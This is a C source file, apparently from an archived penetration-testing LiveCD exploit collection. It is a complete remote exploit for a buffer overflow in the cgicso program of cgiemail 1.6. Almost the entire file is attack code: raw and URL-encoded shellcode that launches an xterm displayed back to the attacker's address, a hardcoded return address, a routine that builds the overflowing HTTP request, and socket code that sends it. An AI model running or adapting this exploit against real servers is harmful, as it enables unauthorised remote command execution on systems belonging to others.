home *** CD-ROM | disk | FTP | other *** search
/ Chip 2007 January, February, March & April / Chip-Cover-CD-2007-02.iso / Pakiet bezpieczenstwa / mini Pentoo LiveCD 2006.1 / mpentoo-2006.1.iso / livecd.squashfs / opt / pentoo / ExploitTree / application / mail / cgiemail / cso.c < prev   
Encoding:
C/C++ Source or Header  |  2005-02-12  |  4.4 KB  |  210 lines
  1. /*
  2.  * cso.c (06/30/01)
  3.  *
  4.  * Remote exploit for cgicso included with cgiemail 1.6
  5.  * Tested on Slackware Linux 7.1 running Apache 1.3.20
  6.  * Spawns an xterm on your display.
  7.  *
  8.  *
  9.  * Note: In order to exploit, cgicso must be compiled with
  10.  * CGI_CSO_HARDCODE undefined, otherwise it will bypass
  11.  * the exploitable portion of code.
  12.  *
  13.  *
  14.  * Exploit By: isox of hhp. (isox@chainsawbeer.com)
  15.  * Site: www.hhp-programming.net && 0xc0ffee.com
  16. */
  17.  
  18. #include <stdio.h>
  19. #include <stdlib.h>
  20. #include <unistd.h>
  21. #include <sys/socket.h>
  22. #include <netinet/in.h>
  23. #include <netdb.h>
  24.  
  25. #define RET 0xbfffe208 // Slackware 7.1.0
  26. #define LEN 2038
  27. #define PORT 80
  28.  
  29. char noncode[] =
  30.   "\xeb\x4f\x5e\x31\xd2\x88\x56\x14\x88\x56\x18\x88\x56\x21\xb2\x2b"
  31.   "\x31\xc9\xb1\x09\x80\x3c\x32\x4b\x74\x05\x42\xe2\xf7\xeb\x2b\x88"
  32.   "\x34\x32\x31\xd2\x89\xf3\x89\x76\x36\x8d\x7e\x15\x89\x7e\x3a\x8d"
  33.   "\x7e\x19\x89\x7e\x3e\x8d\x7e\x22\x89\x7e\x42\x89\x56\x46\x8d\x4e"
  34.   "\x36\x8d\x56\x46\x31\xc0\xb0\x0b\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
  35.   "\x80\xe8\xac\xff\xff\xff"
  36.   "/usr/X11R6/bin/xterm8-ut8-display8127.0.0.1:0K";
  37.  
  38. char code[] =
  39.   "%eb%4f%5e%31%d2%88%56%14%88%56%18%88%56%21%b2%2b%31%c9%b1%9%80%3c"
  40.   "%32%4b%74%5%42%e2%f7%eb%2b%88%34%32%31%d2%89%f3%89%76%36%8d%7e%15"
  41.   "%89%7e%3a%8d%7e%19%89%7e%3e%8d%7e%22%89%7e%42%89%56%46%8d%4e%36%8d"
  42.   "%56%46%31%c0%b0%b%cd%80%31%db%89%d8%40%cd%80%e8%ac%ff%ff%ff%2f%75"
  43.   "%73%72%2f%58%31%31%52%36%2f%62%69%6e%2f%78%74%65%72%6d%38%2d%75%74"
  44.   "%38%2d%64%69%73%70%6c%61%79%38"
  45.   "%31%32%37%2e%30%2e%30%2e%31" // unicoded IP address
  46.   "%3a%30%4b";
  47.  
  48.  
  49.  
  50. int main(int argc, char *argv[]) {
  51.   char *buf, *p;
  52.   long *addressp, address=RET;
  53.   int i, diff=(strlen(code) - strlen(noncode)), sock, debug=0;
  54.   struct hostent *t;
  55.   struct sockaddr_in s;
  56.  
  57.  
  58.   if(argc < 2) {
  59.     fprintf(stderr, "usage: %s <host> [offset [--debug]]\n", argv[0]);
  60.     exit(-1);
  61.   }
  62.  
  63.   if(argc > 2)
  64.     address -= atoi(argv[2]);
  65.  
  66.   if(argc > 3) {
  67.     if((!strcmp(argv[3], "--debug")) || (!strcmp(argv[3], "-d")))
  68.       debug = 1;
  69.   }
  70.  
  71.  
  72.   fprintf(stderr, "Using Address: 0x%lx\n", address);
  73.  
  74.   buf = (char *)malloc(44 + LEN + diff + 1);
  75.   p = buf;
  76.  
  77.  
  78.   (*p++) = 'G';
  79.   (*p++) = 'E';
  80.   (*p++) = 'T';
  81.   (*p++) = ' ';
  82.   (*p++) = '/';
  83.   (*p++) = 'c';
  84.   (*p++) = 'g';
  85.   (*p++) = 'i';
  86.   (*p++) = '-';
  87.   (*p++) = 'b';
  88.   (*p++) = 'i';
  89.   (*p++) = 'n';
  90.   (*p++) = '/';
  91.   (*p++) = 'c';
  92.   (*p++) = 'g';
  93.   (*p++) = 'i';
  94.   (*p++) = 'c';
  95.   (*p++) = 's';
  96.   (*p++) = 'o';
  97.   (*p++) = '?';
  98.   (*p++) = 'f';
  99.   (*p++) = 'i';
  100.   (*p++) = 'n';
  101.   (*p++) = 'g';
  102.   (*p++) = 'e';
  103.   (*p++) = 'r';
  104.   (*p++) = 'h';
  105.   (*p++) = 'o';
  106.   (*p++) = 's';
  107.   (*p++) = 't';
  108.   (*p++) = '=';
  109.   (*p++) = 'A'; // Yes this should be an A
  110.   (*p++) = '&';
  111.   (*p++) = 'q';
  112.   (*p++) = 'u';
  113.   (*p++) = 'e';
  114.   (*p++) = 'r';
  115.   (*p++) = 'y';
  116.   (*p++) = '=';
  117.   (*p++) = 'A'; // Yes this should be an A
  118.   (*p++) = 'A'; // Yes this should be an A
  119.   (*p++) = 'A'; // Yes this should be an A
  120.  
  121.   for(i=0; i<strlen(code); i++)
  122.     (*p++) = code[i];
  123.  
  124.   addressp = (long *)p;
  125.  
  126.   for(i=0; i<(LEN - strlen(code)) + diff; i+=4)
  127.     (*addressp++) = address;
  128.  
  129.  
  130.   strcat(buf, "\n\n");
  131.   fprintf(stderr, "Using length: %d\n", strlen(buf));
  132.  
  133.  
  134.  
  135.  
  136. /*
  137.  * Connect
  138.  */
  139.  
  140.   if(s.sin_addr.s_addr=inet_addr(argv[1])) {
  141.     if(!(t=gethostbyname(argv[1]))) {
  142.       printf("Connection Failed.\n");
  143.       exit(-1);
  144.     }
  145.  
  146.     memcpy((char*)&s.sin_addr,(char*)t->h_addr,sizeof(s.sin_addr));
  147.   }
  148.  
  149.   s.sin_family=AF_INET;
  150.   s.sin_port=htons(PORT);
  151.  
  152.   sock=socket(AF_INET,SOCK_STREAM,0);
  153.  
  154.  
  155.   if(connect(sock,(struct sockaddr*)&s,sizeof(s))) {
  156.     fprintf(stderr, "Connection failed.\n");
  157.     exit(-1);
  158.   }
  159.  
  160.   fprintf(stderr, "done.\n");
  161.   fprintf(stderr, "Sending buffer... ");
  162.   send(sock, buf, strlen(buf), 0);
  163.   fprintf(stderr, "done.\n");
  164.  
  165.   sleep(2);
  166.  
  167.   if(debug == 1) {
  168.     fprintf(stderr, "Entering Debug Mode... \n");
  169.     initstream(sock);
  170.   }
  171.  
  172.   close(sock);
  173.   free(buf);
  174.   exit(0);
  175. }
  176.  
  177.  
  178.  
  179. int initstream(int sock) {
  180.   int n;
  181.   char recvbuf[1024];
  182.   fd_set rset;
  183.  
  184.   while (1) {
  185.     FD_ZERO(&rset);
  186.     FD_SET(sock,&rset);
  187.     FD_SET(STDIN_FILENO,&rset);
  188.     select(sock+1,&rset,NULL,NULL,NULL);
  189.  
  190.     if (FD_ISSET(sock,&rset)) {
  191.       if((n=read(sock,recvbuf,1024)) <= 0) {
  192.         printf("Connection closed by foreign host.\n");
  193.         exit(0);
  194.       }
  195.  
  196.       recvbuf[n]=0;
  197.       printf("%s",recvbuf);
  198.     }
  199.  
  200.     if (FD_ISSET(STDIN_FILENO,&rset)) {
  201.       if((n=read(STDIN_FILENO,recvbuf,1024)) > 0) {
  202.         recvbuf[n]=0;
  203.         write(sock,recvbuf,n);
  204.       }
  205.     }
  206.   }
  207.  
  208.   return;
  209. }
  210.